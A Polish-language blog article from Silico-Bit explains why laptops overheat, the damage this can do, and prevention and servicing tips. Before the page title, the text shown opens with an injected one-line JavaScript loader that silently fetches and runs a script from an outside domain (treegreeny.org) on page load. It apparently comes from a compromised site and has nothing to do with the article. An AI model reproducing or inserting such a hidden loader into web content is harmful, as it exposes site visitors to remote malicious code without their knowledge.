;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Przegrzewanie laptopa – czym może skutkować i jak go uniknąć? | Silico-Bit
Jeśli kiedykolwiek spotkałeś się z sytuacją, że obudowa Twojego laptopa zaczęła się gwałtownie nagrzewać, nie ignoruj tego sygnału. Z pewnością jesteś w stanie stwierdzić, że coś nienaturalnego dzieje się ze sprzętem. Wniosek jest prosty – trzeba działać szybko, zanim laptop zostanie trwale uszkodzony. Bowiem nagrzewa się nie tylko obudowa, ale także wewnętrzne elementy urządzenia. Co możemy z tym zrobić i jak zapobiegać przegrzewaniu laptopa?

Przegrzewanie laptopa

Dlaczego laptop się przegrzewa?

Laptop to przenośny zamiennik komputera stacjonarnego i wcale nie odbiega od niego wydajnością. Wyobraźmy sobie więc, że wszelkie komponenty z dużej bryły komputera, zostają przeniesione do laptopa. Zbiór ogromu elementów na małej przestrzeni i tylko jeden wentylator, który to wszystko chłodzi. Laptop służy nam do załatwiania wielu codziennych spraw, takich jak praca, szkoła, ale także rozrywka i odpoczynek. W momencie, kiedy moc obliczeniowa poszczególnych komponentów rośnie, podzespoły laptopa pracują z ogromnym obciążeniem. Wskutek tego powstaje pewien uboczny efekt korzystania ze sprzętu, mianowicie energia cieplna. O ile kanały wentylacyjne, przez które ciepło jest dosłownie wywiewane na zewnątrz, są udrożnione, po chwili nagrzania laptop od razu się chłodzi. Problem powstaje jednak wtedy, kiedy w kanałach zalega kurz. Efektywność wentylacji spada, a podzespoły nagrzewają się nadmiernie.

Czym grozi przegrzewanie laptopa?

Nadmierne przegrzewanie laptopa może spowodować szereg nieprzyjemnych skutków, m.in. utratę pierwotnej wydajności, zmniejszenie mocy i szybkości laptopa, a nawet poważne uszkodzenie wewnętrznych podzespołów. Warto wspomnieć, że sama konstrukcja laptopa oraz umiejscowionego w nim układu chłodzącego, może powodować skłonność do zwiększonego nagrzewania się sprzętu. Warto więc już podczas zakupu sprawdzić umiejscowienie kanałów wentylacyjnych oraz dostęp do poszczególnych komponentów i zapobiegać przegrzewaniu. Jak to zrobić?

Jak zapobiegać przegrzewaniu laptopa?

Przede wszystkim należy regularnie dbać o otoczenie laptopa. Nie należy zostawiać go w miejscach nadmiernie zakurzonych. Burko powinno być dokładnie przecierane z kurzu co kilka dni.

Ponadto należy stanowczo unikać stawiania laptopa na miękkich powierzchniach typu kanapy, poduszki, koce. To ogranicza dopływ powietrza od spodu i po bokach, blokując tym samym wentylację energii cieplnej.

Możemy także zacząć używać podstawek chłodzących, które zawierają kilka wentylatorów, chłodzących urządzenie. W ten sposób laptop ma stały dostęp do zimnego strumienia powietrza, który ochładza wewnętrzne elementy, jak i samą obudowę.

Warto także raz na jakiś czas odkurzać wloty wentylatora. Nie ma potrzeby otwierania obudowy laptopa, jeśli nie nagrzewa się on nienaturalnie. Róbmy to przy okazji odkurzania domu. W ten sposób wejdzie nam to w nawyk. A co zrobić, kiedy nagrzewanie laptopa stało się już poważnym problemem?

Czyszczenie i serwis laptopa

W takim przypadku należy rzeczywiście dostać się do wewnętrznych komponentów i kanałów wentylacyjnych i na jak najniższej mocy odkurzacza dokładnie usunąć kłęby kurzu. Jednak bez specjalistycznych narzędzi oraz doświadczenia i wiedzy, nie jesteśmy w stanie zrobić tego samodzielnie. Dlatego warto powierzyć to profesjonalistom. Serwis laptopów zadba o problem nadmiernego przegrzewania się laptopa poprzez dokładne czyszczenie oraz instalację oprogramowania, które będzie monitorować oraz regulować temperaturę wewnątrz urządzenia. Istnieją także programy do ręcznego ustawiania szybkości obrotowej wentylatora. Jeśli nadejdzie taka potrzeba, serwis może wymienić podzespoły na cichsze i chłodniejsze. Najczęściej robi się to w przypadku pamięci HDD. Wówczas wymienia się ją na pamięć SSF. Z pewnością profesjonalny serwis zajmie się tym problemem kompleksowo i udzieli kilku rad, jak dbać o laptop na co dzień, aby nie przegrzewał się nadmiernie podczas codziennej pracy.